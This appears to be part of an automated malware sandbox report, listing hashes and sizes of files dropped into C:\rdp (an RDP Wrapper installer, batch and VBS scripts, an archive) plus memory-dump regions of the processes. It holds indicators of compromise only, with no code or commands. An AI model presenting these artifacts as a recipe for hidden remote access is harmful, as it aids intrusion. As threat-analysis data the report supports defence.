SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
C:\rdp\RDPWInst.exeFilesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
C:\rdp\Rar.exeFilesize
370KB
MD52e86a9862257a0cf723ceef3868a1a12
SHA1a4324281823f0800132bf13f5ad3860e6b5532c6
SHA2562356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA5123a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de
-
C:\rdp\Rar.exeFilesize
370KB
MD52e86a9862257a0cf723ceef3868a1a12
SHA1a4324281823f0800132bf13f5ad3860e6b5532c6
SHA2562356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA5123a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de
-
C:\rdp\bat.batFilesize
1KB
MD55835a14baab4ddde3da1a605b6d1837a
SHA194b73f97d5562816a4b4ad3041859c3cfcc326ea
SHA256238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92
SHA512d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e
-
C:\rdp\db.rarFilesize
443KB
MD5462f221d1e2f31d564134388ce244753
SHA16b65372f40da0ca9cd1c032a191db067d40ff2e3
SHA256534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432
SHA5125e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086
-
C:\rdp\install.vbsFilesize
80B
MD56d12ca172cdff9bcf34bab327dd2ab0d
SHA1d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493
SHA256f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec
SHA512b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342
-
C:\rdp\pause.batFilesize
352B
MD5a47b870196f7f1864ef7aa5779c54042
SHA1dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA25646565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60
-
C:\rdp\run.vbsFilesize
84B
MD56a5f5a48072a1adae96d2bd88848dcff
SHA1b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c
-
\??\c:\program files\rdp wrapper\rdpwrap.dllFilesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\??\c:\program files\rdp wrapper\rdpwrap.iniFilesize
128KB
MD5dddd741ab677bdac8dcd4fa0dda05da2
SHA169d328c70046029a1866fd440c3e4a63563200f9
SHA2567d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
SHA5126106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec
-
memory/224-136-0x0000000000000000-mapping.dmp
-
memory/604-162-0x0000000000000000-mapping.dmp
-
memory/708-243-0x0000000000000000-mapping.dmp
-
memory/1004-194-0x0000000000000000-mapping.dmp
-
memory/1004-205-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1004-204-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1004-200-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1004-209-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1004-208-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1004-210-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1736-214-0x0000000000000000-mapping.dmp
-
memory/1760-206-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1760-195-0x0000000000000000-mapping.dmp
-
memory/1760-211-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1760-212-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1760-207-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1760-213-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1832-147-0x0000000000000000-mapping.dmp
-
memory/1904-274-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1904-277-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1904-275-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1904-276-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1904-272-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1904-273-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/1964-143-0x0000000000000000-mapping.dmp
-
memory/2008-261-0x0000000000000000-mapping.dmp
-
memory/2024-220-0x0000000000000000-mapping.dmp
-
memory/2040-219-0x0000000000000000-mapping.dmp
-
memory/2068-248-0x0000000000000000-mapping.dmp
-
memory/2208-247-0x0000000000000000-mapping.dmp
-
memory/2460-217-0x0000000000000000-mapping.dmp
-
memory/2488-245-0x0000000000000000-mapping.dmp
-
memory/2532-224-0x0000000000000000-mapping.dmp
-
memory/2544-152-0x0000000000000000-mapping.dmp
-
memory/2596-253-0x0000000000000000-mapping.dmp
-
memory/2672-239-0x0000000000B50000-0x0000000000C3C000-memory.dmpFilesize
944KB
-
memory/2672-238-0x0000000000B50000-0x0000000000C3C000-memory.dmpFilesize
944KB
-
memory/2672-225-0x0000000000000000-mapping.dmp
-
memory/2680-241-0x0000000000000000-mapping.dmp
-
memory/2772-130-0x0000000000000000-mapping.dmp
-
memory/2800-132-0x0000000000000000-mapping.dmp
-
memory/2800-262-0x0000000000000000-mapping.dmp
-
memory/2936-223-0x0000000000000000-mapping.dmp
-
memory/2980-199-0x0000000000000000-mapping.dmp
-
memory/3148-222-0x0000000000000000-mapping.dmp
-
memory/3204-231-0x0000000000000000-mapping.dmp
-
memory/3272-139-0x0000000000000000-mapping.dmp
-
memory/3412-258-0x0000000000000000-mapping.dmp
-
memory/3456-142-0x0000000000000000-mapping.dmp
-
memory/3472-228-0x0000000000000000-mapping.dmp
-
memory/3480-230-0x0000000000000000-mapping.dmp
-
memory/3512-229-0x0000000000000000-mapping.dmp
-
memory/3596-260-0x0000000000000000-mapping.dmp
-
memory/3684-233-0x0000000000000000-mapping.dmp
-
memory/3804-174-0x0000000000000000-mapping.dmp
-
memory/3944-218-0x0000000000000000-mapping.dmp
-
memory/3944-257-0x0000000000000000-mapping.dmp
-
memory/4008-232-0x0000000000000000-mapping.dmp
-
memory/4032-180-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4032-178-0x0000000000000000-mapping.dmp
-
memory/4032-202-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4032-184-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4032-182-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4032-181-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4032-183-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4048-255-0x0000000000000000-mapping.dmp
-
memory/4064-242-0x0000000000000000-mapping.dmp
-
memory/4072-256-0x0000000000000000-mapping.dmp
-
memory/4128-145-0x0000000000000000-mapping.dmp
-
memory/4192-269-0x0000000000000000-mapping.dmp
-
memory/4304-294-0x0000000000000000-0x0000000000200000-memory.dmpFilesize
2.0MB
-
memory/4304-292-0x00000000001B0000-0x00000000001C0000-memory.dmpFilesize
64KB
-
memory/4304-293-0x0000000000000000-0x0000000000200000-memory.dmpFilesize
2.0MB
-
memory/4460-263-0x0000000000000000-mapping.dmp
-
memory/4512-235-0x0000000000000000-mapping.dmp
-
memory/4536-161-0x0000000000000000-mapping.dmp
-
memory/4576-158-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4576-159-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4576-157-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4576-160-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4576-156-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4576-148-0x0000000000000000-mapping.dmp
-
memory/4576-163-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4576-151-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4584-254-0x0000000000000000-mapping.dmp
-
memory/4592-240-0x0000000000000000-mapping.dmp
-
memory/4612-186-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4612-188-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4612-189-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4612-190-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4612-187-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4612-197-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4628-266-0x0000000000000000-mapping.dmp
-
memory/4640-246-0x0000000000000000-mapping.dmp
-
memory/4640-173-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4640-166-0x0000000000000000-mapping.dmp
-
memory/4640-168-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4640-169-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4640-171-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4640-170-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4640-177-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4640-172-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/4692-244-0x0000000000000000-mapping.dmp
-
memory/4696-237-0x0000000000000000-mapping.dmp
-
memory/4768-155-0x0000000000000000-mapping.dmp
-
memory/4864-270-0x0000000000000000-mapping.dmp
-
memory/4940-252-0x0000000000000000-mapping.dmp
-
memory/4984-267-0x0000000000000000-mapping.dmp
-
memory/5024-268-0x0000000000000000-mapping.dmp
-
memory/5056-236-0x0000000000000000-mapping.dmp
-
memory/5080-221-0x0000000000000000-mapping.dmp
-
memory/5092-259-0x0000000000000000-mapping.dmp